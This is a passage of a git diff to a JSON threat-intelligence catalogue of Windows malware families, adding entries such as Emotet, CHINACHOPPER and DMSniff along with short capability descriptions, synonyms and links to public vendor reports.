backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://attack.mitre.org/software/S0043/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d114ee6c-cf7d-408a-8077-d59e736f5a66", + "value": "BUBBLEWRAP" + }, { "description": "", "meta": { @@ -4345,10 +5373,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", - "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", + "https://malware-research.org/carbanak-source-code-leaked/", "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", + "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/", + "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", - "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/" + "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/" ], "synonyms": [ "Ratopak" @@ -4381,8 +5411,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", + "https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/", "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/", "http://malware-traffic-analysis.net/2017/05/09/index.html", + "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/", "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/" ], @@ -4505,6 +5537,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon", + "https://www.vkremez.com/2018/11/lets-learn-in-depth-on-sofacy-canon.html", "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" ], "synonyms": [], @@ -4518,6 +5551,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", + "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf" @@ -4547,7 +5581,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412", + "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" ], "synonyms": [], "type": [] @@ -4555,6 +5590,19 @@ "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", "value": "Cardinal RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat", + "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4ad06a5f-12e6-44ae-9547-98ee62114357", + "value": "CarrotBat" + }, { "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.", "meta": { @@ -4714,6 +5762,22 @@ "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", "value": "ChewBacca" }, + { + "description": "a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html", + "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html", + "https://attack.mitre.org/software/S0020/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0d8f0bb7-e14f-4b85-baa1-6ec951aa6c53", + "value": "CHINACHOPPER" + }, { "description": "Adware that shows advertisements using plugin techniques for popular browsers", "meta": { @@ -4829,18 +5893,36 @@ "value": "CMSTAR" }, { - "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coalabot", + "https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7acd9a27-f550-4c47-9fc8-429b61b04217", + "value": "CoalaBot" + }, + { + "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", - "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", + "https://blog.cobaltstrike.com/", + "https://www.cobaltstrike.com/support", "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", - "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", + "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", + "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + "https://401trg.com/burning-umbrella/ ", + "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/", "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", - "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html" + "http://cyberforensicator.com/2018/12/23/dissecting-cozy-bears-malicious-lnk-file/" ], "synonyms": [], "type": [] @@ -5061,11 +6143,13 @@ "https://www.honeynet.org/files/KYE-Conficker.pdf", "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf", "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html", + "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker", "https://github.com/tillmannw/cnfckr", "http://www.confickerworkinggroup.org/wiki/uploads/Conficker_Working_Group_Lessons_Learned_17_June_2010_final.pdf", "http://contagiodump.blogspot.com/2009/05/win32conficker.html" ], "synonyms": [ + "Kido", "downadup", "traffic converter" ], @@ -5129,6 +6213,19 @@ "uuid": "495377c4-1be5-4c65-ba66-94c221061415", "value": "Corebot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn", + "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "331f0c80-a795-48aa-902e-0b0d57de85f5", + "value": "CoreDN" + }, { "description": "", "meta": { @@ -5166,6 +6263,7 @@ "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf", + "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" ], "synonyms": [ @@ -5177,6 +6275,19 @@ "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", "value": "CrashOverride" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.creamsicle", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9d193a65-dc18-4832-9daa-aab245cd1c86", + "value": "CREAMSICLE" + }, { "description": "", "meta": { @@ -5207,13 +6318,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", + "https://s.tencent.com/research/report/669.html", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" ], - "synonyms": [], + "synonyms": [ + "SEEDOOR" + ], "type": [] }, "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", - "value": "Crimson" + "value": "Crimson RAT" }, { "description": "", @@ -5235,11 +6350,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", - "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", + "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", "https://hackmag.com/security/ransomware-russian-style/", - "https://twitter.com/demonslay335/status/971164798376468481", - "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx" + "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/", + "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", + "https://twitter.com/demonslay335/status/971164798376468481" ], "synonyms": [], "type": [] @@ -5558,15 +6674,21 @@ "value": "Dairy" }, { - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", - "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", - "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/" + "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/", + "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/", + "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html", + "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", + "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", + "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/", + "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/", + "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/" ], "synonyms": [], "type": [] @@ -5579,10 +6701,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", - "https://darkcomet.net", - "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", + "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", - "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/" + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", + "https://darkcomet.net", + "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/" ], "synonyms": [ "Fynloski", @@ -5818,7 +6942,7 @@ "value": "DeriaLock" }, { - "description": "", + "description": " A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", @@ -5826,7 +6950,9 @@ "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" ], - "synonyms": [], + "synonyms": [ + "PHOTO" + ], "type": [] }, "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", @@ -5930,6 +7056,19 @@ "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", "value": "DirCrypt" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs", + "https://twitter.com/cyb3rops/status/1101138784933085191" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3bbf08fd-f147-4b23-9d48-a53ac836bc05", + "value": "DispenserXFS" + }, { "description": "", "meta": { @@ -5940,7 +7079,9 @@ "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", - "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" + "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", + "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/" ], "synonyms": [], "type": [] @@ -5963,6 +7104,19 @@ "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed", "value": "DMA Locker" }, + { + "description": "DMSniff is a point-of-sale malware previously only privately sold. It has been used in breaches of small- and medium-sized businesses in the restaurant and entertainment industries. It uses a domain generation algorithm (DGA) to create lists of command-and-control domains on the fly.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff", + "https://www.flashpoint-intel.com/blog/dmsniff-pos-malware-actively-leveraged-target-medium-sized-businesses/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", + "value": "DMSniff" + }, { "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.", "meta": { @@ -5972,7 +7126,9 @@ "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html", "https://blog.talosintelligence.com/2017/03/dnsmessenger.html" ], - "synonyms": [], + "synonyms": [ + "TEXTMATE" + ], "type": [] }, "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", @@ -5983,9 +7139,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage", - "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html" + "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/", + "https://www.us-cert.gov/ncas/alerts/AA19-024A", + "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html", + "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html", + "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/", + "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" + ], + "synonyms": [ + "Agent Drable", + "Webmask" ], - "synonyms": [], "type": [] }, "uuid": "ef46bd90-91d0-4208-b3f7-08b65acb8438", @@ -6123,6 +7288,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", @@ -6139,6 +7305,24 @@ "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", "value": "Dridex" }, + { + "description": "Driftpin is a small and simple backdoor that enables the attackers to assess the victim. When executed the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes and get information about the system and campaign ID.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", + "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/" + ], + "synonyms": [ + "Spy.Agent.ORM", + "Toshliph" + ], + "type": [] + }, + "uuid": "76f6f047-1362-4651-bd2f-9ca10c119e8d", + "value": "DRIFTPIN" + }, { "description": "", "meta": { @@ -6253,7 +7437,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", - "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates" + "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "Dyreza" @@ -6289,6 +7474,20 @@ "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", "value": "EHDevel" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder", + "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf", + "https://www.clearskysec.com/iec/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "31b18d64-815c-4464-8fcc-f084953a75f5", + "value": "ElectricPowder" + }, { "description": "", "meta": { @@ -6318,6 +7517,23 @@ "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", "value": "Elise" }, + { + "description": "ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings. To retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer", + "https://www.symantec.com/security-center/writeup/2015-122210-5724-99", + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", + "https://attack.mitre.org/software/S0064" + ], + "synonyms": [ + "Elmost" + ], + "type": [] + }, + "uuid": "e0a8bb01-f0c8-4e2c-bd1e-4c84135ba834", + "value": "ELMER" + }, { "description": "", "meta": { @@ -6334,6 +7550,54 @@ "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", "value": "Emdivi" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", + "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", + "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/", + "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", + "https://github.com/d00rt/emotet_research", + "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", + "https://www.us-cert.gov/ncas/alerts/TA18-201A", + "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", + "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", + "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1", + "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/", + "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", + "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", + "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", + "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html", + "https://persianov.net/emotet-malware-analysis-part-1", + "https://persianov.net/emotet-malware-analysis-part-2", + "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol", + "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", + "https://paste.cryptolaemus.com", + "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", + "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/", + "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", + "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", + "https://feodotracker.abuse.ch/?filter=version_e", + "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", + "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", + "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69" + ], + "synonyms": [ + "Geodo", + "Heodo" + ], + "type": [] + }, + "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", + "value": "Emotet" + }, { "description": "", "meta": { @@ -6530,6 +7794,20 @@ "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", "value": "EvilGrab" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum", + "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", + "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "da922c36-ca13-4ea2-a22d-471e91ddac93", + "value": "EVILNUM (Windows)" + }, { "description": "Privately modded version of the Pony stealer.", "meta": { @@ -6590,6 +7868,19 @@ "uuid": "74f8db32-799c-41e5-9815-6272908ede57", "value": "MS Exchange Tool" }, + { + "description": "ExileRAT is a simple RAT platform capable of getting information on the system (computer name, username, listing drives, network adapter, process name), getting/pushing files and executing/terminating processes.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat", + "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c932a2f3-1470-4b0c-8412-2d081901277b", + "value": "Exile RAT" + }, { "description": "", "meta": { @@ -6696,6 +7987,19 @@ "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", "value": "FantomCrypt" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer", + "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f197b0a8-6bea-42ea-b57f-8f6f202f7602", + "value": "Farseer" + }, { "description": "", "meta": { @@ -6886,11 +8190,38 @@ "uuid": "1ab17959-6254-49af-af26-d34e87073e49", "value": "FirstRansom" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame", + "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c40dbede-490f-4df4-a242-a2461e3cfc4e", + "value": "Flame" + }, + { + "description": " FLASHFLOOD will scan inserted removable drives for targeted files, and copy those files from the\r\nremovable drive to the FLASHFLOOD-infected system. FLASHFLOOD may also log or copy additional data from the victim computer, such as system information\r\nor contacts.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0ce7e94e-da65-43e4-86f0-9a0bb21d1118", + "value": "FLASHFLOOD" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", + "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930", "https://github.com/Coldzer0/Ammyy-v3", "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", @@ -6902,6 +8233,20 @@ "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", "value": "FlawedAmmyy" }, + { + "description": "According to ProofPoint, FlawedGrace is written in C++ and can be categorized as a Remote Access Trojan (RAT). It seems to have been developed in the second half of 2017 mainly.\r\n\r\nFlawedGrace uses a series of commands:\r\nFlawedGrace also uses a series of commands, provided below for reference:\r\n* desktop_stat\r\n* destroy_os\r\n* target_download\r\n* target_module_load\r\n* target_module_load_external\r\n* target_module_unload\r\n* target_passwords\r\n* target_rdp\r\n* target_reboot\r\n* target_remove\r\n* target_script\r\n* target_servers\r\n* target_update\r\n* target_upload\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace", + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ef591233-4246-414b-9fbd-46838f3e5da2", + "value": "FlawedGrace" + }, { "description": "", "meta": { @@ -6935,6 +8280,19 @@ "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", "value": "FlokiBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop", + "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": 